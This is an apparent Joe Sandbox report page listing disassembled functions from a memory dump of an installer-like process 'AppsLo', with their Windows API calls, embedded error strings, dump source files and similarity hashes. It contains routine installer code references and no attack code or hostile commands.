Instruction ID: 5b809938e30afcec20d5917bd9331028d75da6efc0c1a5f73beaabeb7b41776e
Opcode Fuzzy Hash: 6db5caf945942aab8c1dd410ac220f926aab69118d71490c9b84fd6b672e4f72
Instruction Fuzzy Hash: 1011D332D44169BBEF12AED9CC418AEFB78FF12750F104166F910E6611D2725E609B91

Function 008B820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

Part of subcall function 008A394F: GetProcessHeap.KERNEL32(?,000001C7,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3960
Part of subcall function 008A394F: RtlAllocateHeap.NTDLL(00000000,?,008A2274,000001C7,00000001,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3967

CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,008B8E17,0000001A,00000000,?,00000000,00000000), ref: 008B8258
GetLastError.KERNEL32(?,?,008B8E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 008B8262

Strings

Failed to allocate memory for well known SID., xrefs: 008B8240
Failed to create well known SID., xrefs: 008B8290
cache.cpp, xrefs: 008B8236, 008B8286

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$AllocateCreateErrorKnownLastProcessWell
String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
API String ID: 2186923214-2110050797
Opcode ID: e3e6a003d7ed992c1ecdaf7b55649035b5fec3382a73cddda4dd796113a54b41
Instruction ID: 1f4f1a7078830bf5dcfc693cbe3f3db0de4277ab59154921ce39dae443b436f9
Opcode Fuzzy Hash: e3e6a003d7ed992c1ecdaf7b55649035b5fec3382a73cddda4dd796113a54b41
Instruction Fuzzy Hash: 3C01E933545A35F7D63166994C06EAB6A5CFF42B70F150026FE14FB340EE789D4085E5

Function 008CDDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON

Download Yara Rule

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 008CDDCE
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 008CDDF8
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,008CDFC8,00000000,?,?,?,?,00000000), ref: 008CDE00

Strings

Failed while waiting for download., xrefs: 008CDE2E
bitsuser.cpp, xrefs: 008CDE24

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLastMessageMultipleObjectsPeekWait
String ID: Failed while waiting for download.$bitsuser.cpp
API String ID: 435350009-228655868
Opcode ID: 2f34e4afee752edc365c05f0af5a756272f2cc5186dbdc4f70932ecd60acd7a4
Instruction ID: 2a37672765c1ca38e8930e148a24d76d1f321b66c2cf4de306f5986ccff0aebe
Opcode Fuzzy Hash: 2f34e4afee752edc365c05f0af5a756272f2cc5186dbdc4f70932ecd60acd7a4
Instruction Fuzzy Hash: 5E110273A4133577D7206AA99C49FABBBACFB05B24F000139FE05FB280D670D90082E1

Function 008E3C72 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 61COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(?), ref: 008E3CC0
GetLastError.KERNEL32(?,?,00000000), ref: 008E3CCA
CloseHandle.KERNEL32(?,?,?,00000000), ref: 008E3CFD

Strings

<, xrefs: 008E3CB2
shelutil.cpp, xrefs: 008E3CEB

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CloseErrorExecuteHandleLastShell
String ID: <$shelutil.cpp
API String ID: 3023784893-3991740012
Opcode ID: 4a11d4de70390e04829c5f5896bd906d72834158168c5585099a05c3ca20cbc7
Instruction ID: 42202e0fe672a63a6d5ade089bb0dd43eaf4b6641d9b934923ead02dfcbb20a0
Opcode Fuzzy Hash: 4a11d4de70390e04829c5f5896bd906d72834158168c5585099a05c3ca20cbc7
Instruction Fuzzy Hash: 5D11C575E01259ABDB10DFA9D849A9E7BF8FB09750F104125FD15E7240E730DE108BA5

Function 008A5F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

GetComputerNameW.KERNEL32(?,00000010), ref: 008A5F5C
GetLastError.KERNEL32 ref: 008A5F66

Strings

variable.cpp, xrefs: 008A5F8A
Failed to get computer name., xrefs: 008A5F94
Failed to set variant value., xrefs: 008A5FAD

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ComputerErrorLastName
String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
API String ID: 3560734967-484636765
Opcode ID: 93220c1569948ec327208fa68b5ad9b9e23a8e3b7f8936accc25dc8471704a54
Instruction ID: 8e70af0bf12808b226df39c5a1ce111652e98e1ddc1256fbfd0e7cb43730fdd4
Opcode Fuzzy Hash: 93220c1569948ec327208fa68b5ad9b9e23a8e3b7f8936accc25dc8471704a54
Instruction Fuzzy Hash: 6B11E933A45A69AFD720DAA99C05FDEB7E8FB09720F110015FD00FB280DA74AE4447E1

Function 008A5E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?), ref: 008A5EA6

Part of subcall function 008E0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,008A5EB2,00000000), ref: 008E0AE0
Part of subcall function 008E0ACC: GetProcAddress.KERNEL32(00000000), ref: 008E0AE7
Part of subcall function 008E0ACC: GetLastError.KERNEL32(?,?,?,008A5EB2,00000000), ref: 008E0AFE

Part of subcall function 008E3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008E3D4C

Strings

Failed to get 64-bit folder., xrefs: 008A5EF0
variable.cpp, xrefs: 008A5ED0
Failed to set variant value., xrefs: 008A5F0A
Failed to get shell folder., xrefs: 008A5EDA

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
API String ID: 2084161155-3906113122
Opcode ID: b46d96f81a09dc1fce73ac9f360facdb273b1e9c1195f7f8ce546216fb9e19fa
Instruction ID: 1b5a6990fb1a177c6de8c77b091a113aed9716819ad99f7a31dc3e6472d14084
Opcode Fuzzy Hash: b46d96f81a09dc1fce73ac9f360facdb273b1e9c1195f7f8ce546216fb9e19fa
Instruction Fuzzy Hash: 4001C831941669BBEF12A795CC06F9E7A68FF02720F104151F800F6540DF789F909BD2

Function 008E4153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008E4440: FindFirstFileW.KERNEL32(008C923A,?,00000100,00000000,00000000), ref: 008E447B
Part of subcall function 008E4440: FindClose.KERNEL32(00000000), ref: 008E4487

SetFileAttributesW.KERNEL32(008C923A,00000080,00000000,008C923A,000000FF,00000000,?,?,008C923A), ref: 008E4182
GetLastError.KERNEL32(?,?,008C923A), ref: 008E418C
DeleteFileW.KERNEL32(008C923A,00000000,008C923A,000000FF,00000000,?,?,008C923A), ref: 008E41AC
GetLastError.KERNEL32(?,?,008C923A), ref: 008E41B6

Strings

fileutil.cpp, xrefs: 008E41D1

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
String ID: fileutil.cpp
API String ID: 3967264933-2967768451
Opcode ID: 4c3b2f14705e2c4f7d5ea76b8996248d6b35e31c6e01332b53fc2a426823a181
Instruction ID: 5e2f52603528d402e11f077a0f336582b45ccaa0236b5526bc01c12c3555de7a
Opcode Fuzzy Hash: 4c3b2f14705e2c4f7d5ea76b8996248d6b35e31c6e01332b53fc2a426823a181
Instruction Fuzzy Hash: D001F532A416B6ABDF314AAB8C44B5B7E98FF26761F010220FD58EA1D0D721DD9095D0

Function 008CDA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 008CDA1A
LeaveCriticalSection.KERNEL32(?), ref: 008CDA5F
SetEvent.KERNEL32(?,?,?,?), ref: 008CDA73

Strings

Failed to get state during job modification., xrefs: 008CDA33
Failure while sending progress during BITS job modification., xrefs: 008CDA4E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
API String ID: 3094578987-1258544340
Opcode ID: e3eaaf6d84e117bf841f38814da680b408109cc35e8e04c04fefa6c729e89c45
Instruction ID: a1f226c201a1b54a474b4c25e32bf66672bae48ae4f3a85abbb7652a94a7e5b0
Opcode Fuzzy Hash: e3eaaf6d84e117bf841f38814da680b408109cc35e8e04c04fefa6c729e89c45
Instruction Fuzzy Hash: C5018C72A0572ABBCB11EB55C889FAAB7B8FF55321B004269F905D7640DB30EE04CAD5

Function 008CDC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,008CDDEE), ref: 008CDC92
LeaveCriticalSection.KERNEL32(00000008,?,008CDDEE), ref: 008CDCD7
SetEvent.KERNEL32(?,?,008CDDEE), ref: 008CDCEB

Strings

Failed to get BITS job state., xrefs: 008CDCAB
Failure while sending progress., xrefs: 008CDCC6

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID: Failed to get BITS job state.$Failure while sending progress.
API String ID: 3094578987-2876445054
Opcode ID: 0747e18dcd7ee70df8d5d4812bb436824eaeaca04c5dc3be81b4c4efc5dca5b9
Instruction ID: 37325c4a96bb66e5dfcb03888029cf0b1245231274bdc437783919cab36fc604
Opcode Fuzzy Hash: 0747e18dcd7ee70df8d5d4812bb436824eaeaca04c5dc3be81b4c4efc5dca5b9
Instruction Fuzzy Hash: A201F532A01716BBCB15AB49D889E9BB7B8FF44320B000169F904D7750DB70ED00CBD4

Function 008CD7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,008CDF52,?,?,?,?,?,?,00000000,00000000), ref: 008CD802
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,008CDF52,?,?,?,?,?,?,00000000,00000000), ref: 008CD80D
GetLastError.KERNEL32(?,008CDF52,?,?,?,?,?,?,00000000,00000000), ref: 008CD81A

Strings

Failed to create BITS job complete event., xrefs: 008CD848
bitsuser.cpp, xrefs: 008CD83E

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CreateCriticalErrorEventInitializeLastSection
String ID: Failed to create BITS job complete event.$bitsuser.cpp
API String ID: 3069647169-3441864216
Opcode ID: ca81c264da7c23c73cf48118662e7820df1ae3cb93127b1995116f0d0800fc25
Instruction ID: aad4e985a1345ae46c92ae0c2632a873b4ed86ec2489aa817d929db9bf80dee1
Opcode Fuzzy Hash: ca81c264da7c23c73cf48118662e7820df1ae3cb93127b1995116f0d0800fc25
Instruction Fuzzy Hash: 8B0152769417266BD320AB5AD845A47BBA8FF49760B01413AFE08E7640E770D800CBE4

Function 008AD4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,008B7040,000000B8,00000000,?,00000000,7694B390), ref: 008AD4B7
InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 008AD4C6
LeaveCriticalSection.KERNEL32(000000D0,?,008B7040,000000B8,00000000,?,00000000,7694B390), ref: 008AD4DB

Strings

user active cannot be changed because it was already in that state., xrefs: 008AD4FE
userexperience.cpp, xrefs: 008AD4F4

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: user active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: a5857e024d0720c2c5c129b19ea356fe6cbefdc765f8a134326eb6b31ef66922
Instruction ID: 19aef65ac41b44781d91088910026dd618caa6b9348c5e3893ccec1cf2238e9c
Opcode Fuzzy Hash: a5857e024d0720c2c5c129b19ea356fe6cbefdc765f8a134326eb6b31ef66922
Instruction Fuzzy Hash: 67F0AF32300749AFAB205EAA9C88C9773ACFB96761300442AF612D7A40DB74E9058B60

Function 008E1C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 008E1CB3
GetLastError.KERNEL32(?,008A49DA,00000001,?,?,008A4551,?,?,?,?,008A5466,?,?,?,?), ref: 008E1CC2

Strings

SRSetRestorePointW, xrefs: 008E1CA8
srputil.cpp, xrefs: 008E1CE3
srclient.dll, xrefs: 008E1C91

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
API String ID: 199729137-398595594
Opcode ID: 058d0470a48b86f7f42bda36cbd79fa4e6e8542231074ae2ee6d744097c95714
Instruction ID: 8fdb3909692b8f99b5793b31a936e2b33af5ed4b6eeac3bc32b47d39269866c0
Opcode Fuzzy Hash: 058d0470a48b86f7f42bda36cbd79fa4e6e8542231074ae2ee6d744097c95714
Instruction Fuzzy Hash: 5201A236B956B65BDB2216AB5C0DB5A6884FB02FA5F110122BD01EB2A0DB31DC40D6D6

Function 008D495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008D490E,00000000,?,008D48AE,00000000,00907F08,0000000C,008D4A05,00000000,00000002), ref: 008D497D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008D4990
FreeLibrary.KERNEL32(00000000,?,?,?,008D490E,00000000,?,008D48AE,00000000,00907F08,0000000C,008D4A05,00000000,00000002), ref: 008D49B3

Strings

CorExitProcess, xrefs: 008D4988
mscoree.dll, xrefs: 008D4976

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: bd033ad336904a66a869a0f9730bb95abcbd733d21dfaeb2a7634b6c3a8dd9f3
Instruction ID: bbb6632a1f4da41eefc656b1d1b444807be2b7a174d7c872ca832cc1c17b99fe
Opcode Fuzzy Hash: bd033ad336904a66a869a0f9730bb95abcbd733d21dfaeb2a7634b6c3a8dd9f3
Instruction Fuzzy Hash: 72F04F30A10208BFCB119FA5DC6ABAFBFB8FF44715F004169F905E62A0CB719940CB95

Function 008B9287 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 008B93C9

Part of subcall function 008E56CF: GetLastError.KERNEL32(?,?,008B933A,?,00000003,00000000,?), ref: 008E56EE

Strings

Failed to get certificate public key identifier., xrefs: 008B93F7
Failed to read certificate thumbprint., xrefs: 008B93BD
Failed to find expected public key in certificate chain., xrefs: 008B938A
cache.cpp, xrefs: 008B93ED

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: ErrorLast
String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
API String ID: 1452528299-3408201827
Opcode ID: de8f916012e3f254c70ee5920d27bfd3f92fa2262c338c1df7dd2590855666f0
Instruction ID: 1ec6265e2348986726243bf330ca2391e219b63b8aea3cf8e5a104d666804dbe
Opcode Fuzzy Hash: de8f916012e3f254c70ee5920d27bfd3f92fa2262c338c1df7dd2590855666f0
Instruction Fuzzy Hash: E6415B72A04619ABDB10DAA9C881AEEB7F8FB0C710F054029FA55E7391D674ED00CBA0

Function 008A21AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A21F2
GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A21FE

Part of subcall function 008A3BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BDB
Part of subcall function 008A3BD3: HeapSize.KERNEL32(00000000,?,008A21CC,000001C7,80004005,8007139F,?,?,008E0267,8007139F,?,00000000,00000000,8007139F), ref: 008A3BE2

Strings

strutil.cpp, xrefs: 008A2222

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
String ID: strutil.cpp
API String ID: 3662877508-3612885251
Opcode ID: c062d607fae718ddbe1b4654e7b96868dad0a4bdcd8e31bc6dcf30417aed6cd9
Instruction ID: 01d79678d7b8e82e85c7c321af144efaaf6d6c36fc92c280f60d75e5d9c9a1f7
Opcode Fuzzy Hash: c062d607fae718ddbe1b4654e7b96868dad0a4bdcd8e31bc6dcf30417aed6cd9
Instruction Fuzzy Hash: 6031A43260122AABE7308EADCC44B6BBA95FF57774B210225FD15DB690E671DC4087D1

Function 008E94FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON

Download Yara Rule

APIs

Part of subcall function 008E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0090AAA0,00000000,?,008E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008E0F80

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008E95D5
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 008E9610
RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008E962C
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008E9639
RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008E9646

Part of subcall function 008E0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008E95C2,00000001), ref: 008E0FED

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 02cc8eb1efcd0d791c8ae3b438042255e26fb7a8dc5b9fd049ffd3cdcce57849
Instruction ID: 4fc7261ee468ec3b8890d3e25bfb2b1c30989c44fca1130987006a3622ccaa04
Opcode Fuzzy Hash: 02cc8eb1efcd0d791c8ae3b438042255e26fb7a8dc5b9fd049ffd3cdcce57849
Instruction Fuzzy Hash: EB418D72C0026DFFCF21AF9ACC819ADFBB9FF25714F11416AE950B6221C7B14E509A90

Function 008A8A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,008A8BC8,008A972D,?,008A972D,?,?,008A972D,?,?), ref: 008A8A27
lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,008A8BC8,008A972D,?,008A972D,?,?,008A972D,?,?), ref: 008A8A2F
CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,008A8BC8,008A972D,?,008A972D,?), ref: 008A8A7E
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,008A8BC8,008A972D,?,008A972D,?), ref: 008A8AE0
CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,008A8BC8,008A972D,?,008A972D,?), ref: 008A8B0D

Memory Dump Source

Source File: 00000006.00000002.2467513593.00000000008A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000006.00000002.2467467102.00000000008A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467552710.00000000008EB000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467589468.000000000090A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2467605855.000000000090D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_8a0000_AppsLo.jbxd

